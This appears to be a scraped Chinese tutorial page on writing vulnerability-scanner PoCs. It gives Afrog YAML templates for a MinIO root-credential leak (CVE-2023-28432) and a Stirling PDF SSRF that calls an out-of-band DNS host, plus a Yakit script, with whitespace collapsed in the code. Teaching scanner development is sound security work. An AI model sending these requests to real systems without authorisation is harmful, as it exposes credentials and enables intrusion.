当前位置: 首页 > news >正文

漏扫发现-Web服务篇Poc开发Yakit插件编写Afrog项目Yaml语法Yak语言接受匹配

知识点:
Poc开发-远程漏扫-Afrog项目&Yakit原生语法&模版插件

演示案例-Poc开发-远程漏扫-Afrog项目&Yakit原生语法&模版插件

一、Afrog Poc开发

官方POC规则写法:https://github.com/zan8in/afrog/wiki/Afrog-PoC-%E8%A7%84%E5%88%99%E7%BC%96%E5%86%99%E6%9D%83%E5%A8%81%E6%8C%87%E5%8D%97


1、MinIO集群模式信息泄露漏洞 (CVE-2023-28432)

靶场地址:https://github.com/vulhub/vulhub/tree/master/minio/CVE-2023-28432

测试:afrog.exe -t https://xx.xx.xx.xx:xxxx -P minio.yaml

id: CVE-2023-28432 info: name: My PoC demo1 author: xiaodisec severity: critical rules: r0: request: method: POST path: /minio/bootstrap/v1/verify headers: Content-Type: application/x-www-form-urlencoded expression: response.status==200&&response.body.bcontains(b'MINIO_ROOT_PASSWORD')expression: r0()

2、Stirling PDF SSRF漏洞 (CVE-2025-55161)

测试:afrog.exe -t https://xx.xx.xx.xx:xxxx -P SSRF.yaml --oob dnslogcn

id: CVE-2025-55161 info: name: My PoC demo2 author: xiaodisec severity: critical set: username: randomLowercase(6)rules: r0: request: method: POST path: /api/v1/convert/markdown/pdf headers: Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryvAfAbBmFpYrQfooK body:|- ------WebKitFormBoundaryvAfAbBmFpYrQfooK Content-Disposition: form-data;name="fileInput";filename="{{username}}.md"Content-Type: application/octet-stream<imgsrc='http://{{oob.DNS}}/'>------WebKitFormBoundaryvAfAbBmFpYrQfooK-- expression: oobCheck(oob.ProtocolDNS,5)expression: r0()

二、Yakit Poc插件开发


1、基于Nuclei Yaml语法

官方POC编写参考地址:https://www.yaklang.com/docs/security/cap8-4-yaml-poc




2、基于Yak原语言(不推荐该方法,比较麻烦)

loglevel(`info`)yakit.AutoInitYakit()sendPacket=func(target){returnpoc.HTTP(`POST /minio/bootstrap/v1/verify HTTP/1.1 Host:{{params(target)}}Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0(Windows NT10.0;Win64;x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/110.0.5481.178 Safari/537.36 Connection: close Cache-Control: max-age=0Content-Type: application/x-www-form-urlencoded Content-Length:0`, poc.params({"target":target,}),)}target=cli.String("target")iftarget==""{die("no target")}result="MINIO_ROOT_USER"rsp, _, err=sendPacket(target)die(err)headers, body=str.SplitHTTPHeadersAndBodyFromPacket(rsp)ifstr.MatchAllOfSubString(body, result){yakit.StatusCard("发现漏洞", target)log.info("find token: %v", result)}


http://www.gsyq.cn/news/1637348.html

相关文章:

  • 《用AI做公众号流量主》第13课:为什么 99% 的人用 AI 生产的都是“电子垃圾”?
  • 手中有机, 心中不慌 (5 只 二手 Android 手机)
  • CTF ECC基础离散对数爆破 解题Writeup
  • Agent 云原生运行时:智能体也需要健康检查
  • Java毕设项目:中小型乡村民宿山庄综合业务管理系统的设计与实现 基于 Java 的民宿客户信息与消费记录管理系统 (源码+文档,讲解、调试运行,定制等)
  • AT 指令学习手册:从对话逻辑到实战排错
  • Avalonia NativeControlHost
  • CSS Cascade Layer:样式优先级要靠架构,不靠赌命名
  • 原神120帧解锁终极指南:免费提升游戏流畅度的完整教程
  • 服务器安全(Windows Server+Linux)
  • 基于STM32单片机车位引导 智能停车场计费系统 刷卡识别 WIFI成品12(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_
  • Linux groupdel命令详解|用户组删除、主组报错解决、强制删除实战教程
  • 21_LangChain源码总览_读源码前必看的地图
  • 2026年VIVO嵌入式岗位高频面试题(含参考答案)
  • 郴州热门火锅店理性测评|行业避坑+科学选型指南
  • 2026年精选好口碑苦荞粉推荐,健康美味不容错过
  • Codex 编程智能体入门指南
  • 2026封神!5款AI论文平台实测,小白变学霸,初稿直逼优秀模板!
  • 单卡训练大模型:LLaMA Factory显存优化实战
  • 【Crypto】RSA 小指数入门解密
  • Harness 介绍及使用场景
  • GORM 单表操作与高级查询
  • 哪怕MCP再强,我也劝你保留一点“控制欲”
  • Python异步代理池实战:从requests阻塞到httpx.AsyncClient,爬虫效率翻倍的踩坑记录
  • Flexbox对齐搞错,布局全崩!
  • 2026智能床垫的技术架构:从传感器到AI算法的完整链路
  • Qwen3.6-27B 本地代码能力评测(一)
  • 解密微信QQ防撤回:Windows平台逆向工程实战指南 [特殊字符]️
  • 【Springboot毕设全套源码+文档】基于springboot电子外设销售系统的设计与实现(丰富项目+远程调试+讲解+定制)
  • 【面板数据模型实战】从理论到Stata/R/Python实现与选择